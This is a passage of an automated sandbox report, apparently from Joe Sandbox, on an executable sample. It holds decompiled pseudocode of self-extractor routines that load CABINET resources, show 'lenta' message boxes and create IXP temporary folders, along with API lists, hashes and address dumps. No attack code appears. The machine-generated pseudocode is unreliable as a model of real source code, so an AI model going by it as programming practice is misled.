                                                                                                                                                                                                                                              							E001A44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(( *0x1a8a38 & 0x00000001) == 0 && ( *0x1a9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              						SendMessageA( *0x1a8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}
















                                                                                                                                                                                                                                              0x001a4fe0
                                                                                                                                                                                                                                              0x001a4fe6
                                                                                                                                                                                                                                              0x001a4ff9
                                                                                                                                                                                                                                              0x001a500d
                                                                                                                                                                                                                                              0x001a5013
                                                                                                                                                                                                                                              0x001a501a
                                                                                                                                                                                                                                              0x001a5163
                                                                                                                                                                                                                                              0x001a5163
                                                                                                                                                                                                                                              0x001a5020
                                                                                                                                                                                                                                              0x001a5027
                                                                                                                                                                                                                                              0x001a5037
                                                                                                                                                                                                                                              0x001a5051
                                                                                                                                                                                                                                              0x001a5051
                                                                                                                                                                                                                                              0x001a5057
                                                                                                                                                                                                                                              0x001a505e
                                                                                                                                                                                                                                              0x001a50a7
                                                                                                                                                                                                                                              0x001a50ad
                                                                                                                                                                                                                                              0x001a50b4
                                                                                                                                                                                                                                              0x001a50e8
                                                                                                                                                                                                                                              0x001a50e8
                                                                                                                                                                                                                                              0x001a50ee
                                                                                                                                                                                                                                              0x001a50ff
                                                                                                                                                                                                                                              0x001a5104
                                                                                                                                                                                                                                              0x001a5106
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5106
                                                                                                                                                                                                                                              0x001a50cd
                                                                                                                                                                                                                                              0x001a50d3
                                                                                                                                                                                                                                              0x001a50da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a50dd
                                                                                                                                                                                                                                              0x001a50e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5060
                                                                                                                                                                                                                                              0x001a5060
                                                                                                                                                                                                                                              0x001a5070
                                                                                                                                                                                                                                              0x001a5075
                                                                                                                                                                                                                                              0x001a5107
                                                                                                                                                                                                                                              0x001a5107
                                                                                                                                                                                                                                              0x001a510e
                                                                                                                                                                                                                                              0x001a5111
                                                                                                                                                                                                                                              0x001a5117
                                                                                                                                                                                                                                              0x001a5117
                                                                                                                                                                                                                                              0x001a511f
                                                                                                                                                                                                                                              0x001a5121
                                                                                                                                                                                                                                              0x001a5127
                                                                                                                                                                                                                                              0x001a5135
                                                                                                                                                                                                                                              0x001a5135
                                                                                                                                                                                                                                              0x001a5127
                                                                                                                                                                                                                                              0x001a5141
                                                                                                                                                                                                                                              0x001a5159
                                                                                                                                                                                                                                              0x001a5159
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a515f

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 001A4FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 001A5006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 001A500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 001A5030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 001A5037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 001A504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 001A5051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 001A5111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 001A5159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: c777cb6f35ea7493746e78cfe2fd2b5570f73fdbafbc8d758de509e4004b1af9
                                                                                                                                                                                                                                              • Instruction ID: 5eee972d5a5208b1cdc626f45b346da3072c390d6898bfdc906cdc20d7ee5588
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c777cb6f35ea7493746e78cfe2fd2b5570f73fdbafbc8d758de509e4004b1af9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931B4B87847027BE7205B61AD89F77369DFB8B765F440025F906A29A2DBF48CC0C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 406 1a44b9-1a44f8 407 1a4679-1a467b 406->407 408 1a44fe-1a4525 LoadStringA 406->408 411 1a467c-1a468c call 1a6ce0 407->411 409 1a4562-1a4568 408->409 410 1a4527-1a452e call 1a681f 408->410 412 1a456b-1a4570 409->412 420 1a453f 410->420 421 1a4530-1a453d call 1a67c9 410->421 412->412 416 1a4572-1a457c 412->416 418 1a45c9-1a45cb 416->418 419 1a457e-1a4580 416->419 424 1a45cd-1a45cf 418->424 425 1a4607-1a4617 LocalAlloc 418->425 422 1a4583-1a4588 419->422 426 1a4544-1a4554 MessageBoxA 420->426 421->420 421->426 422->422 429 1a458a-1a458c 422->429 431 1a45d2-1a45d7 424->431 427 1a455a-1a455d 425->427 428 1a461d-1a4628 call 1a1680 425->428 426->427 427->411 435 1a462d-1a463d MessageBeep call 1a681f 428->435 433 1a458f-1a4594 429->433 431->431 434 1a45d9-1a45ed LocalAlloc 431->434 433->433 436 1a4596-1a45ad LocalAlloc 433->436 434->427 437 1a45f3-1a4605 call 1a171e 434->437 444 1a464e 435->444 445 1a463f-1a464c call 1a67c9 435->445 436->427 440 1a45af-1a45c7 call 1a171e 436->440 437->435 440->435 448 1a4653-1a4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                                                                              				char _v576;
                                                                                                                                                                                                                                              				void* _v580;
                                                                                                                                                                                                                                              				struct HWND__* _v584;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				signed int _t52;
                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                              				intOrPtr _t55;
                                                                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                                                                              				int _t64;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                                                                              				intOrPtr* _t77;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                                                              				_t34 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                              				_v584 = __ecx;
                                                                                                                                                                                                                                              				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                              				_t67 = _a4;
                                                                                                                                                                                                                                              				_t69 = 0xd;
                                                                                                                                                                                                                                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                              				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                              				_v580 = _t37;
                                                                                                                                                                                                                                              				asm("movsb");
                                                                                                                                                                                                                                              				if(( *0x1a8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              					_t39 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_v576 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x1a9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                              					if(_v576 != 0) {
                                                                                                                                                                                                                                              						_t73 =  &_v576;
                                                                                                                                                                                                                                              						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                              						_t75 = _t16;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t43 =  *_t73;
                                                                                                                                                                                                                                              							_t73 = _t73 + 1;
                                                                                                                                                                                                                                              						} while (_t43 != 0);
                                                                                                                                                                                                                                              						_t84 = _v580;
                                                                                                                                                                                                                                              						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                                                                                              							if(_t67 == 0) {
                                                                                                                                                                                                                                              								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                              								_t83 = _t27;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t75 = _t83;
                                                                                                                                                                                                                                              									_t74 = _t80;
                                                                                                                                                                                                                                              									E001A1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t76 = _t67;
                                                                                                                                                                                                                                              								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                              								_t85 = _t24;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t55 =  *_t76;
                                                                                                                                                                                                                                              									_t76 = _t76 + 1;
                                                                                                                                                                                                                                              								} while (_t55 != 0);
                                                                                                                                                                                                                                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                              								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                              								_t80 = _t44;
                                                                                                                                                                                                                                              								if(_t80 == 0) {
                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t77 = _t67;
                                                                                                                                                                                                                                              							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                              							_t81 = _t18;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t58 =  *_t77;
                                                                                                                                                                                                                                              								_t77 = _t77 + 1;
                                                                                                                                                                                                                                              							} while (_t58 != 0);
                                                                                                                                                                                                                                              							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                              							_t82 = _t84 + 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t59 =  *_t84;
                                                                                                                                                                                                                                              								_t84 = _t84 + 1;
                                                                                                                                                                                                                                              							} while (_t59 != 0);
                                                                                                                                                                                                                                              							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                              							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                              							_t80 = _t44;
                                                                                                                                                                                                                                              							if(_t80 == 0) {
                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_push(_v580);
                                                                                                                                                                                                                                              								E001A171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                                                              								MessageBeep(_a12);
                                                                                                                                                                                                                                              								if(E001A681F(_t67) == 0) {
                                                                                                                                                                                                                                              									L25:
                                                                                                                                                                                                                                              									_t49 = 0x10000;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t54 = E001A67C9(_t74, _t74);
                                                                                                                                                                                                                                              									_t49 = 0x190000;
                                                                                                                                                                                                                                              									if(_t54 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                              								_t83 = _t52;
                                                                                                                                                                                                                                              								LocalFree(_t80);
                                                                                                                                                                                                                                              								_t39 = _t52;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(E001A681F(_t67) == 0) {
                                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                                              							_t64 = 0x10010;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t66 = E001A67C9(0, 0);
                                                                                                                                                                                                                                              							_t64 = 0x190010;
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x001a44b9
                                                                                                                                                                                                                                              0x001a44c4
                                                                                                                                                                                                                                              0x001a44cb
                                                                                                                                                                                                                                              0x001a44d8
                                                                                                                                                                                                                                              0x001a44e4
                                                                                                                                                                                                                                              0x001a44eb
                                                                                                                                                                                                                                              0x001a44ee
                                                                                                                                                                                                                                              0x001a44ef
                                                                                                                                                                                                                                              0x001a44ef
                                                                                                                                                                                                                                              0x001a44f1
                                                                                                                                                                                                                                              0x001a44f7
                                                                                                                                                                                                                                              0x001a44f8
                                                                                                                                                                                                                                              0x001a467b
                                                                                                                                                                                                                                              0x001a44fe
                                                                                                                                                                                                                                              0x001a4509
                                                                                                                                                                                                                                              0x001a4518
                                                                                                                                                                                                                                              0x001a4525
                                                                                                                                                                                                                                              0x001a4562
                                                                                                                                                                                                                                              0x001a4568
                                                                                                                                                                                                                                              0x001a4568
                                                                                                                                                                                                                                              0x001a456b
                                                                                                                                                                                                                                              0x001a456b
                                                                                                                                                                                                                                              0x001a456d
                                                                                                                                                                                                                                              0x001a456e
                                                                                                                                                                                                                                              0x001a4572
                                                                                                                                                                                                                                              0x001a4578
                                                                                                                                                                                                                                              0x001a457c
                                                                                                                                                                                                                                              0x001a45cb
                                                                                                                                                                                                                                              0x001a4607
                                                                                                                                                                                                                                              0x001a4607
                                                                                                                                                                                                                                              0x001a460d
                                                                                                                                                                                                                                              0x001a4613
                                                                                                                                                                                                                                              0x001a4617
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a461d
                                                                                                                                                                                                                                              0x001a4623
                                                                                                                                                                                                                                              0x001a4626
                                                                                                                                                                                                                                              0x001a4628
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4628
                                                                                                                                                                                                                                              0x001a45cd
                                                                                                                                                                                                                                              0x001a45cd
                                                                                                                                                                                                                                              0x001a45cf
                                                                                                                                                                                                                                              0x001a45cf
                                                                                                                                                                                                                                              0x001a45d2
                                                                                                                                                                                                                                              0x001a45d2
                                                                                                                                                                                                                                              0x001a45d4
                                                                                                                                                                                                                                              0x001a45d5
                                                                                                                                                                                                                                              0x001a45db
                                                                                                                                                                                                                                              0x001a45de
                                                                                                                                                                                                                                              0x001a45e3
                                                                                                                                                                                                                                              0x001a45e9
                                                                                                                                                                                                                                              0x001a45ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a45f3
                                                                                                                                                                                                                                              0x001a45fd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4602
                                                                                                                                                                                                                                              0x001a45ed
                                                                                                                                                                                                                                              0x001a457e
                                                                                                                                                                                                                                              0x001a457e
                                                                                                                                                                                                                                              0x001a4580
                                                                                                                                                                                                                                              0x001a4580
                                                                                                                                                                                                                                              0x001a4583
                                                                                                                                                                                                                                              0x001a4583
                                                                                                                                                                                                                                              0x001a4585
                                                                                                                                                                                                                                              0x001a4586
                                                                                                                                                                                                                                              0x001a458a
                                                                                                                                                                                                                                              0x001a458c
                                                                                                                                                                                                                                              0x001a458f
                                                                                                                                                                                                                                              0x001a458f
                                                                                                                                                                                                                                              0x001a4591
                                                                                                                                                                                                                                              0x001a4592
                                                                                                                                                                                                                                              0x001a459b
                                                                                                                                                                                                                                              0x001a459e
                                                                                                                                                                                                                                              0x001a45a3
                                                                                                                                                                                                                                              0x001a45a9
                                                                                                                                                                                                                                              0x001a45ad
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a45af
                                                                                                                                                                                                                                              0x001a45af
                                                                                                                                                                                                                                              0x001a45bf
                                                                                                                                                                                                                                              0x001a462d
                                                                                                                                                                                                                                              0x001a4630
                                                                                                                                                                                                                                              0x001a463d
                                                                                                                                                                                                                                              0x001a464e
                                                                                                                                                                                                                                              0x001a464e
                                                                                                                                                                                                                                              0x001a463f
                                                                                                                                                                                                                                              0x001a4640
                                                                                                                                                                                                                                              0x001a4647
                                                                                                                                                                                                                                              0x001a464c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a464c
                                                                                                                                                                                                                                              0x001a4666
                                                                                                                                                                                                                                              0x001a466d
                                                                                                                                                                                                                                              0x001a466f
                                                                                                                                                                                                                                              0x001a4675
                                                                                                                                                                                                                                              0x001a4675
                                                                                                                                                                                                                                              0x001a45ad
                                                                                                                                                                                                                                              0x001a4527
                                                                                                                                                                                                                                              0x001a452e
                                                                                                                                                                                                                                              0x001a453f
                                                                                                                                                                                                                                              0x001a453f
                                                                                                                                                                                                                                              0x001a4530
                                                                                                                                                                                                                                              0x001a4531
                                                                                                                                                                                                                                              0x001a4538
                                                                                                                                                                                                                                              0x001a453d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a453d
                                                                                                                                                                                                                                              0x001a4554
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a455a
                                                                                                                                                                                                                                              0x001a4525
                                                                                                                                                                                                                                              0x001a468c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 001A45A3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 001A45E3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 001A460D
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 001A4630
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 001A4666
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A466F
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001A686E
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: GetSystemMetrics.USER32(0000004A), ref: 001A68A7
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001A68CC
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,?,0000000C), ref: 001A68F4
                                                                                                                                                                                                                                                • Part of subcall function 001A681F: RegCloseKey.ADVAPI32(?), ref: 001A6902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: ae996b8f13466edc24ca4a9e240d617f7eb89a360f851461ea746c5c2fee1707
                                                                                                                                                                                                                                              • Instruction ID: 19badc855b786d9dd2b9b2716a454348aac200ce736a0828df5dc50e29ef1e7e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae996b8f13466edc24ca4a9e240d617f7eb89a360f851461ea746c5c2fee1707
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E51367A900215AFDB219F68CC48BBA7B79EF87310F044195FD49A3241DBB1DE45CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E001A171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E001A1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E001A658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E001A6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0x1a8a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x001a53ac
                                                                                                                                                                                                                                              0x001a53b3
                                                                                                                                                                                                                                              0x001a53b9
                                                                                                                                                                                                                                              0x001a53bb
                                                                                                                                                                                                                                              0x001a53bd
                                                                                                                                                                                                                                              0x001a53bf
                                                                                                                                                                                                                                              0x001a53d1
                                                                                                                                                                                                                                              0x001a53d6
                                                                                                                                                                                                                                              0x001a53e0
                                                                                                                                                                                                                                              0x001a53e2
                                                                                                                                                                                                                                              0x001a53f5
                                                                                                                                                                                                                                              0x001a53fb
                                                                                                                                                                                                                                              0x001a5402
                                                                                                                                                                                                                                              0x001a540b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5413
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5415
                                                                                                                                                                                                                                              0x001a5416
                                                                                                                                                                                                                                              0x001a5427
                                                                                                                                                                                                                                              0x001a542a
                                                                                                                                                                                                                                              0x001a542b
                                                                                                                                                                                                                                              0x001a5434
                                                                                                                                                                                                                                              0x001a5434
                                                                                                                                                                                                                                              0x001a543a
                                                                                                                                                                                                                                              0x001a544c
                                                                                                                                                                                                                                              0x001a544c
                                                                                                                                                                                                                                              0x001a5452
                                                                                                                                                                                                                                              0x001a545a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a545e
